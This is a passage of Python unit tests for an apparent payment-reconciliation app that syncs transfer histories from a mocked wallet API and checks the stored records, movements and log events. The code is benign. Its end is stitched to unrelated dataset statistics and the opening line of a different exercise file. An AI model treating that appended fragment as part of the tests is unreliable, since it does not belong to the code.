        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id)
        .all())
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
    ], [e.event_type for e in events])
    event = events[0]
    self.assertEqual('19', event.owner_id)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))
    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(1, len(records))
    record = records[0]
    self.assertEqual('grant', record.workflow_type)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
    self.assertEqual(True, record.completed)
    self.assertEqual(False, record.canceled)
    self.assertEqual('19', record.sender_id)
    self.assertEqual('wingcash:19', record.sender_uid)
    self.assertEqual('11', record.recipient_id)
    self.assertEqual('wingcash:11', record.recipient_uid)
    periods = (
        self.dbsession.query(db.Period)
        .all())
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('19', period.owner_id)
    self.assertEqual(1239, period.file_id)
    # Outer join: the issuance movement has no FileMovement row.
    movements = (
        self.dbsession.query(db.Movement, db.FileMovement)
        .outerjoin(
            db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(3, len(movements))
    m, fm = movements[0]
    self.assertIsNone(fm)
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    m, fm = movements[1]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('11', fm.peer_id)
    self.assertEqual(Decimal('-1.00'), fm.vault_delta)
    self.assertEqual(zero, fm.wallet_delta)
    m, fm = movements[2]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('11', fm.peer_id)
    self.assertEqual(Decimal('-0.25'), fm.vault_delta)
    self.assertEqual(zero, fm.wallet_delta)
    events = self.dbsession.query(db.FileMovementLog).all()
    self.assertEqual(2, len(events))
    event = events[0]
    self.assertEqual('sync_file_movements', event.event_type)
def test_redownload_with_updates(self):
    """Re-sync the same transfer as it evolves: empty -> redeemed -> refunded.

    Each phase re-downloads transfer '500' with updated movements and
    verifies the database reflects the changes incrementally.
    """
    from opnreco.models import db

    def _make_transfer_result():
        # Base transfer payload; phases below mutate a fresh copy.
        return {
            'id': '500',
            'workflow_type': 'redeem',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'someactivity',
            'completed': False,
            'canceled': False,
            'sender_id': '11',
            'sender_uid': 'wingcash:11',
            'sender_info': {
                'title': "Tester",
            },
            'recipient_id': '1102',
            'recipient_uid': 'wingcash:1102',
            'recipient_info': {
                'title': "Acct",
            },
            # No movements yet.
            'movements': [],
        }

    # Phase 1: transfer exists but has no movements.
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj = self._make(owner_id='19')
        obj()
        downloads = self.dbsession.query(db.OPNDownload).all()
        self.assertEqual(1, len(downloads))
        self.assertEqual('19', downloads[0].owner_id)
        events = (
            self.dbsession.query(db.OwnerLog).order_by(db.OwnerLog.id).all())
        self.assertEqual(4, len(events))
        event = events[0]
        self.assertEqual('19', event.owner_id)
        self.assertEqual('opn_sync', event.event_type)
        self.assertEqual(
            {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
            set(event.content.keys()))
        records = self.dbsession.query(db.TransferRecord).all()
        self.assertEqual(1, len(records))
        record = records[0]
        self.assertEqual('redeem', record.workflow_type)
        self.assertEqual(
            datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
        self.assertEqual(
            datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
        self.assertEqual(False, record.completed)
        self.assertEqual(False, record.canceled)
        self.assertEqual('11', record.sender_id)
        self.assertEqual('wingcash:11', record.sender_uid)
        self.assertEqual('1102', record.recipient_id)
        self.assertEqual('wingcash:1102', record.recipient_uid)
        # No movements yet, so no periods/movements/recos.
        periods = self.dbsession.query(db.Period).all()
        self.assertEqual(0, len(periods))
        ms = self.dbsession.query(db.Movement).all()
        self.assertEqual(0, len(ms))
        recos = self.dbsession.query(db.Reco).all()
        self.assertEqual(0, len(recos))

    # Phase 2: simulate the transfer completing the return of the cash
    # to the issuer and re-download.
    result1 = _make_transfer_result()
    result1['movements'] = [{
        'number': 1,
        'timestamp': '2018-08-02T05:06:06Z',
        'action': 'redeem',
        'from_id': '1102',
        'to_id': '19',
        'loops': [{
            'currency': 'USD',
            'loop_id': '0',
            'amount': '1.00',
            'issuer_id': '19',
        }],
    }]
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj()
        events = (
            self.dbsession.query(db.OwnerLog)
            .order_by(db.OwnerLog.id).all())
        self.assertEqual(6, len(events))
        event = events[0]
        self.assertEqual('19', event.owner_id)
        self.assertEqual('opn_sync', event.event_type)
        self.assertEqual(
            {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
            set(event.content.keys()))
        records = self.dbsession.query(db.TransferRecord).all()
        self.assertEqual(1, len(records))
        self.assertFalse(records[0].canceled)
        periods = self.dbsession.query(db.Period).all()
        self.assertEqual(1, len(periods))
        period = periods[0]
        self.assertEqual('19', period.owner_id)
        self.assertEqual(1239, period.file_id)
        movements = (
            self.dbsession.query(db.FileMovement, db.Movement)
            .join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
            .order_by(db.Movement.id)
            .all())
        self.assertEqual(1, len(movements))
        fm, m = movements[0]
        self.assertEqual(record.id, m.transfer_record_id)
        self.assertEqual('0', m.loop_id)
        self.assertEqual('USD', m.currency)
        self.assertEqual('1102', fm.peer_id)
        self.assertEqual(Decimal('1.00'), fm.vault_delta)

    # Phase 3: simulate a failed redemption: the issuer re-issues cash to
    # the profile. Re-download.
    result1 = _make_transfer_result()
    result1['canceled'] = True
    result1['next_activity'] = 'canceled'
    result1['movements'] = [
        # The redeem movement remains.
        {
            'number': 1,
            'timestamp': '2018-08-02T05:06:06Z',
            'action': 'redeem',
            'from_id': '1102',
            'to_id': '19',
            'loops': [{
                'currency': 'USD',
                'loop_id': '0',
                'amount': '1.00',
                'issuer_id': '19',
            }],
        },
        # The refund movement offsets the original movement.
        {
            'number': 2,
            'timestamp': '2018-08-02T05:06:07Z',
            'action': 'refund',
            'from_id': '19',
            'to_id': '1102',
            'loops': [{
                'currency': 'USD',
                'loop_id': '0',
                'amount': '1.00',
                'issuer_id': '19',
            }],
        },
    ]
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj()
        events = (
            self.dbsession.query(db.OwnerLog)
            .order_by(db.OwnerLog.id).all())
        self.assertEqual(7, len(events))
        event = events[-1]
        self.assertEqual('19', event.owner_id)
        self.assertEqual('opn_sync', event.event_type)
        self.assertEqual(
            {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
            set(event.content.keys()))
        records = self.dbsession.query(db.TransferRecord).all()
        self.assertEqual(1, len(records))
        self.assertTrue(records[0].canceled)
        periods = self.dbsession.query(db.Period).all()
        self.assertEqual(1, len(periods))
        period = periods[0]
        self.assertEqual('19', period.owner_id)
        self.assertEqual(1239, period.file_id)
        movements = (
            self.dbsession.query(db.FileMovement, db.Movement)
            .join(db.Movement, db.FileMovement.movement_id == db.Movement.id)
            .order_by(db.Movement.id)
            .all())
        self.assertEqual(2, len(movements))
        fm, m = movements[0]
        self.assertEqual(record.id, m.transfer_record_id)
        self.assertEqual('0', m.loop_id)
        self.assertEqual('USD', m.currency)
        self.assertEqual('1102', fm.peer_id)
        self.assertEqual(Decimal('1.00'), fm.vault_delta)
        fm, m = movements[1]
        self.assertEqual(record.id, m.transfer_record_id)
        self.assertEqual('0', m.loop_id)
        self.assertEqual('USD', m.currency)
        self.assertEqual('1102', fm.peer_id)
        self.assertEqual(Decimal('-1.00'), fm.vault_delta)
def test_redownload_with_no_movements_and_no_updates(self):
    """Re-downloading an identical movement-less transfer changes nothing."""
    from opnreco.models import db

    def _make_transfer_result():
        # Identical payload used for both downloads.
        return {
            'id': '500',
            'workflow_type': 'redeem',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'send_to_dfi',
            'completed': False,
            'canceled': False,
            'sender_id': '11',
            'sender_uid': 'wingcash:11',
            'sender_info': {
                'title': "Tester",
            },
            'recipient_id': '1102',
            'recipient_uid': 'wingcash:1102',
            'recipient_info': {
                'title': "Acct",
            },
            # No movements yet.
            'movements': [],
        }

    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj = self._make(owner_id='19')
        obj()
        periods = self.dbsession.query(db.Period).all()
        self.assertEqual(0, len(periods))
        movements = (
            self.dbsession.query(db.Movement)
            .order_by(db.Movement.number)
            .all())
        self.assertEqual(0, len(movements))

    # Second download with the same payload: still no movements.
    result1 = _make_transfer_result()
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj()
        movements = self.dbsession.query(db.Movement).all()
        self.assertEqual(0, len(movements))
def test_redownload_with_movements_but_no_updates(self):
    """Re-downloading an unchanged transfer does not duplicate movements."""
    from opnreco.models import db

    def _make_transfer_result():
        # A 'redeem' transfer with a single $1.00 movement into the
        # owner's vault (profile 19 is the owner/issuer).
        return {
            'id': '500',
            'workflow_type': 'redeem',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'send_to_dfi',
            'completed': False,
            'canceled': False,
            'sender_id': '11',
            'sender_uid': 'wingcash:11',
            'sender_info': {
                'title': "Tester",
            },
            'recipient_id': '1102',
            'recipient_uid': 'wingcash:1102',
            'recipient_info': {
                'title': "Acct",
            },
            'movements': [
                {
                    'number': 1,
                    'timestamp': '2018-08-02T05:06:06Z',
                    'action': 'redeem',
                    'from_id': '1102',
                    'to_id': '19',
                    'loops': [{
                        'currency': 'USD',
                        'loop_id': '0',
                        'amount': '1.00',
                        'issuer_id': '19',
                    }],
                },
            ],
        }

    # First download creates the period and one movement.
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj = self._make(owner_id='19')
        obj()

    periods = self.dbsession.query(db.Period).all()
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('19', period.owner_id)
    self.assertEqual(1239, period.file_id)

    movements = (
        self.dbsession.query(db.Movement, db.FileMovement)
        .outerjoin(
            db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(1, len(movements))
    m, fm = movements[0]
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('1102', fm.peer_id)
    self.assertEqual(Decimal('1.00'), fm.vault_delta)

    # Second download of the identical transfer adds nothing.
    result1 = _make_transfer_result()
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj()

    mss = self.dbsession.query(db.Movement).all()
    self.assertEqual(1, len(mss))
def test_redownload_with_profile_updates(self):
    """A re-download with changed peer profile info logs a peer_update.

    The second sync carries a new ``screen_name`` for the sender; the
    movement set stays the same but an OwnerLog 'peer_update' entry is
    recorded with the changed username.
    """
    from opnreco.models import db

    def _make_transfer_result():
        # A 'return' transfer from profile 11 to the owner/issuer (19)
        # with a single $1.00 movement.
        return {
            'id': '500',
            'workflow_type': 'return',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'send_to_dfi',
            'completed': False,
            'canceled': False,
            'sender_id': '11',
            'sender_uid': 'wingcash:11',
            'sender_info': {
                'title': "Tester",
            },
            'recipient_id': '19',
            'recipient_uid': 'wingcash:19',
            'recipient_info': {
                'title': "Issuer",
            },
            'movements': [
                {
                    'number': 1,
                    'timestamp': '2018-08-02T05:06:06Z',
                    'action': 'redeem',
                    'from_id': '11',
                    'to_id': '19',
                    'loops': [{
                        'currency': 'USD',
                        'loop_id': '0',
                        'amount': '1.00',
                        'issuer_id': '19',
                    }],
                },
            ],
        }

    # First download.
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj = self._make(owner_id='19')
        obj()

    periods = self.dbsession.query(db.Period).all()
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('19', period.owner_id)
    self.assertEqual(1239, period.file_id)

    mss = self.dbsession.query(db.Movement).all()
    self.assertEqual(1, len(mss))

    movements = (
        self.dbsession.query(db.Movement, db.FileMovement)
        .outerjoin(
            db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(1, len(movements))
    m, fm = movements[0]
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('11', fm.peer_id)
    self.assertEqual(Decimal('1.00'), fm.vault_delta)

    # Second download: same transfer, but the sender's profile now has
    # a screen_name, which should trigger a peer update.
    result1 = _make_transfer_result()
    result1['sender_info']['screen_name'] = 'somefella'
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj()

    # No new movements, but a 'peer_update' event is appended.
    mss = self.dbsession.query(db.Movement).all()
    self.assertEqual(1, len(mss))
    events = (
        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id)
        .all())
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
        'opn_sync',
        'peer_update',
    ], [e.event_type for e in events])
    self.assertEqual({
        'changes': {'username': 'somefella'},
        'peer_id': '11',
    }, events[-1].content)
def test_verification_failure_due_to_changed_workflow_type(self):
    """A re-download that mutates an immutable transfer attribute fails.

    The second sync presents the same transfer with a different
    ``workflow_type``; verification must reject it with
    HTTPInsufficientStorage and an 'Immutable attribute changed' message.
    """
    from pyramid.httpexceptions import HTTPInsufficientStorage

    def _make_transfer_result():
        # A 'redeem' transfer with one movement; re-sent later with a
        # mutated workflow_type to trip the verification step.
        return {
            'id': '500',
            'workflow_type': 'redeem',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'send_to_dfi',
            'completed': False,
            'canceled': False,
            'sender_id': '11',
            'sender_uid': 'wingcash:11',
            'sender_info': {
                'title': "Tester",
            },
            'recipient_id': '1102',
            'recipient_uid': 'wingcash:1102',
            'recipient_info': {
                'title': "Acct",
            },
            'movements': [
                {
                    'number': 1,
                    'timestamp': '2018-08-02T05:06:06Z',
                    'action': 'redeem',
                    'from_id': '1102',
                    'to_id': '19',
                    'loops': [{
                        'currency': 'USD',
                        'loop_id': '0',
                        'amount': '1.00',
                        'issuer_id': '19',
                    }],
                },
            ],
        }

    # First download stores the transfer record.
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        obj = self._make(owner_id='19')
        obj()

    # Second download changes the (immutable) workflow_type.
    result1 = _make_transfer_result()
    result1['workflow_type'] = 'raspberry'
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [result1],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        with self.assertRaises(HTTPInsufficientStorage) as cm:
            obj()

    # assertRegexpMatches was a deprecated alias removed in Python 3.12;
    # assertRegex is the supported spelling.
    self.assertRegex(
        cm.exception.json['error_description'],
        r'Immutable attribute changed')
def test_download_batches(self):
    """Download two batches ('more' flag set) and verify accumulation.

    The first batch reports ``more: True`` with one transfer remaining;
    the second batch delivers the final transfer. Records, movements,
    and log entries should accumulate across both downloads.
    """
    from opnreco.models import db

    def _make_transfer_result():
        # A 'grant' transfer from the issuer (19) to profile 11 with a
        # single $1.00 movement; the second batch reuses it with a new id.
        return {
            'id': '501',
            'workflow_type': 'grant',
            'start': '2018-08-01T04:05:06Z',
            'currency': 'USD',
            'amount': '1.00',
            'timestamp': '2018-08-01T04:05:08Z',
            'next_activity': 'someactivity',
            'completed': False,
            'canceled': False,
            'sender_id': '19',
            'sender_uid': 'wingcash:19',
            'sender_info': {
                'title': "Issuer",
            },
            'recipient_id': '11',
            'recipient_uid': 'wingcash:11',
            'recipient_info': {
                'title': "Tester",
            },
            'movements': [
                {
                    'number': 1,
                    'timestamp': '2018-08-02T05:06:06Z',
                    'action': 'redeem',
                    'from_id': '19',
                    'to_id': '11',
                    'loops': [{
                        'currency': 'USD',
                        'loop_id': '0',
                        'amount': '1.00',
                        'issuer_id': '19',
                    }],
                },
            ],
        }

    # First batch: 'more' is True and one transfer remains, so the
    # reported progress should be partial (50%).
    with responses.RequestsMock() as rsps:
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [_make_transfer_result()],
                'more': True,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
                'remain': 1,
            })
        obj = self._make(owner_id='11')
        download_status = obj()

    self.assertGreaterEqual(download_status['progress_percent'], 0.0)
    self.assertLessEqual(download_status['progress_percent'], 100.0)
    self.assertEqual({
        'change_count': 5,
        'download_count': 1,
        'first_sync_ts': '2018-08-01T04:05:10Z',
        'last_sync_ts': '2018-08-01T04:05:11Z',
        'more': True,
        'progress_percent': 50,
    }, download_status)

    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('11', downloads[0].owner_id)

    events = self.dbsession.query(db.OwnerLog).all()
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
    ], [e.event_type for e in events])
    event = events[0]
    self.assertEqual('11', event.owner_id)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))

    # .one() also asserts exactly one period exists at this point.
    period = self.dbsession.query(db.Period).one()
    mss = (
        self.dbsession.query(db.Movement)
        .filter_by(loop_id='0', currency='USD')
        .all())
    self.assertEqual(1, len(mss))
    mvlog_entries = (
        self.dbsession.query(db.FileMovementLog)
        .all())
    self.assertEqual(1, len(mvlog_entries))

    # Download the last batch.
    with responses.RequestsMock() as rsps:
        transfer_result = _make_transfer_result()
        transfer_result['id'] = '502'
        rsps.add(
            responses.POST,
            'https://opn.example.com:9999/wallet/history_sync',
            json={
                'results': [transfer_result],
                'more': False,
                'first_sync_ts': '2018-08-01T04:05:10Z',
                'last_sync_ts': '2018-08-01T04:05:11Z',
            })
        download_status = obj()

    self.assertEqual({
        'change_count': 7,
        'download_count': 1,
        'first_sync_ts': '2018-08-01T04:05:10Z',
        'last_sync_ts': '2018-08-01T04:05:11Z',
        'more': False,
        'progress_percent': 100,
    }, download_status)

    events = (
        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id).all())
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_period_for_sync',
        'opn_sync',
    ], [e.event_type for e in events])
    event = events[-1]
    self.assertEqual('11', event.owner_id)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))

    # Two transfer records now: '501' from batch 1, '502' from batch 2.
    records = (
        self.dbsession.query(db.TransferRecord)
        .order_by(db.TransferRecord.id).all())
    self.assertEqual(2, len(records))
    record = records[-1]
    self.assertFalse(record.canceled)
    self.assertEqual('502', record.transfer_id)

    periods = self.dbsession.query(db.Period).all()
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('11', period.owner_id)
    self.assertEqual(1239, period.file_id)

    # One movement per record; the owner is the recipient, so the
    # amounts land in the wallet delta.
    movements = (
        self.dbsession.query(db.Movement, db.FileMovement)
        .outerjoin(
            db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(2, len(movements))
    m, fm = movements[0]
    self.assertEqual(records[0].id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('19', fm.peer_id)
    self.assertEqual(Decimal('1.00'), fm.wallet_delta)
    m, fm = movements[1]
    self.assertEqual(records[1].id, m.transfer_record_id)
    self.assertEqual('0', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('19', fm.peer_id)
    self.assertEqual(Decimal('1.00'), fm.wallet_delta)

    mvlogs = (
        self.dbsession.query(db.FileMovementLog)
        .order_by(db.FileMovementLog.id)
        .all())
    self.assertEqual(2, len(mvlogs))
    mvlog = mvlogs[0]
    self.assertEqual('sync_file_movements', mvlog.event_type)
    mvlog = mvlogs[1]
    self.assertEqual('sync_file_movements', mvlog.event_type)
@responses.activate
def test_closed_loop_send_design(self):
    """Sync a closed-loop 'send_design' transfer for the distributor.

    Reconcile closed loop cash for the distributor (profile 12).
    The issuer is profile 15 and the recipient is profile 11.
    Only the distributor's own movement (number 4) gets a FileMovement;
    the issuance movements are stored but not reconciled.
    """
    from opnreco.models import db

    responses.add(
        responses.POST,
        'https://opn.example.com:9999/wallet/history_sync',
        json={
            'results': [{
                'id': '501',
                'workflow_type': 'send_design',
                'start': '2018-08-01T04:05:06Z',
                'currency': 'USD',
                'amount': '1.25',
                'timestamp': '2018-08-01T04:05:08Z',
                'next_activity': 'completed',
                'completed': True,
                'canceled': False,
                'sender_id': '12',
                'sender_uid': 'wingcash:12',
                'sender_info': {
                    'title': "Issuer",
                },
                'recipient_id': '11',
                'recipient_uid': 'wingcash:11',
                'recipient_info': {
                    'title': "Some Tester",
                },
                'movements': [
                    {
                        # Note creation movement
                        'number': 1,
                        'timestamp': '2018-08-02T05:06:06Z',
                        'action': 'issue',
                        'from_id': None,
                        'to_id': '15',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '41',
                            'amount': '1.25',
                            'issuer_id': '15',
                        }],
                    }, {
                        # Issued $1.00 to the distributor (profile 12)
                        'number': 2,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'issue',
                        'from_id': '15',
                        'to_id': '12',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '41',
                            'amount': '1.00',
                            'issuer_id': '15',
                        }],
                    }, {
                        # Issued $0.25 to the distributor (profile 12)
                        'number': 3,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'issue',
                        'from_id': '15',
                        'to_id': '12',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '41',
                            'amount': '0.25',
                            'issuer_id': '15',
                        }],
                    }, {
                        # Sent from the distributor (profile 12)
                        # to the recipient (profile 11)
                        'number': 4,
                        'timestamp': '2018-08-02T05:06:07Z',
                        'action': 'send',
                        'from_id': '12',
                        'to_id': '11',
                        'loops': [{
                            'currency': 'USD',
                            'loop_id': '41',
                            'amount': '1.25',
                            'issuer_id': '15',
                        }],
                    },
                ],
            }],
            'more': False,
            'first_sync_ts': '2018-08-01T04:05:10Z',
            'last_sync_ts': '2018-08-01T04:05:11Z',
        })

    # This file is a reconciliation for the distributor (profile 12).
    obj = self._make(
        owner_id='12',
        file_type='closed_circ',
        auto_enable_loops=True)
    obj()

    downloads = self.dbsession.query(db.OPNDownload).all()
    self.assertEqual(1, len(downloads))
    self.assertEqual('12', downloads[0].owner_id)

    # auto_enable_loops adds an 'add_file_loop_config' event for loop 41.
    events = (
        self.dbsession.query(db.OwnerLog)
        .order_by(db.OwnerLog.id)
        .all())
    self.assertEqual([
        'opn_sync',
        'peer_add',
        'peer_add',
        'add_file_loop_config',
        'add_period_for_sync',
    ], [e.event_type for e in events])
    event = events[0]
    self.assertEqual('12', event.owner_id)
    self.assertEqual(
        {'sync_ts', 'progress_percent', 'transfers', 'change_count'},
        set(event.content.keys()))

    records = self.dbsession.query(db.TransferRecord).all()
    self.assertEqual(1, len(records))
    record = records[0]
    self.assertEqual('send_design', record.workflow_type)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 6), record.start)
    self.assertEqual(
        datetime.datetime(2018, 8, 1, 4, 5, 8), record.timestamp)
    self.assertEqual(True, record.completed)
    self.assertEqual(False, record.canceled)
    self.assertEqual('12', record.sender_id)
    self.assertEqual('wingcash:12', record.sender_uid)
    self.assertEqual('11', record.recipient_id)
    self.assertEqual('wingcash:11', record.recipient_uid)

    periods = (
        self.dbsession.query(db.Period)
        .all())
    self.assertEqual(1, len(periods))
    period = periods[0]
    self.assertEqual('12', period.owner_id)
    self.assertEqual(1239, period.file_id)

    # All four movements are stored, but only the distributor's send
    # (movement 4) is reconciled, i.e. has a FileMovement.
    movements = (
        self.dbsession.query(db.Movement, db.FileMovement)
        .outerjoin(
            db.FileMovement, db.FileMovement.movement_id == db.Movement.id)
        .order_by(db.Movement.id)
        .all())
    self.assertEqual(4, len(movements))
    m, fm = movements[0]
    self.assertIsNone(fm)  # Don't reconcile the note creation
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('41', m.loop_id)
    self.assertEqual('USD', m.currency)
    m, fm = movements[1]
    self.assertIsNone(fm)
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('41', m.loop_id)
    self.assertEqual('USD', m.currency)
    m, fm = movements[2]
    self.assertIsNone(fm)
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('41', m.loop_id)
    self.assertEqual('USD', m.currency)
    m, fm = movements[3]
    self.assertEqual(record.id, m.transfer_record_id)
    self.assertEqual('41', m.loop_id)
    self.assertEqual('USD', m.currency)
    self.assertEqual('11', fm.peer_id)
    # Sending $1.25 out of the vault: negative vault delta, no wallet
    # movement for the distributor.
    self.assertEqual(Decimal('-1.25'), fm.vault_delta)
    self.assertEqual(zero, fm.wallet_delta)

    events = self.dbsession.query(db.FileMovementLog).all()
    self.assertEqual(1, len(events))
    event = events[0]
    self.assertEqual('sync_file_movements', event.event_type)
| 36.903717
| 79
| 0.470632
| 5,760
| 60,559
| 4.80816
| 0.050347
| 0.165192
| 0.0577
| 0.051995
| 0.886225
| 0.869688
| 0.849359
| 0.842788
| 0.838202
| 0.830547
| 0
| 0.064158
| 0.396968
| 60,559
| 1,640
| 80
| 36.92622
| 0.694214
| 0.012946
| 0
| 0.835739
| 0
| 0
| 0.165238
| 0
| 0
| 0
| 0
| 0
| 0.217182
| 1
| 0.016495
| false
| 0
| 0.01512
| 0.004124
| 0.037801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
af37238c950e88823aeedb488c9a75ffb5fc06ed
| 191
|
py
|
Python
|
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | null | null | null |
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | null | null | null |
Python-For-Everyone-Horstmann/Chapter1-Introduction/P1.7.py
|
islayy/Books-solutions
|
5fe05deb4e9f65875284d8af43bd383bf9ae145b
|
[
"MIT"
] | 1
|
2019-09-22T06:27:49.000Z
|
2019-09-22T06:27:49.000Z
|
# Write a program that prints a house that looks exactly like the following:
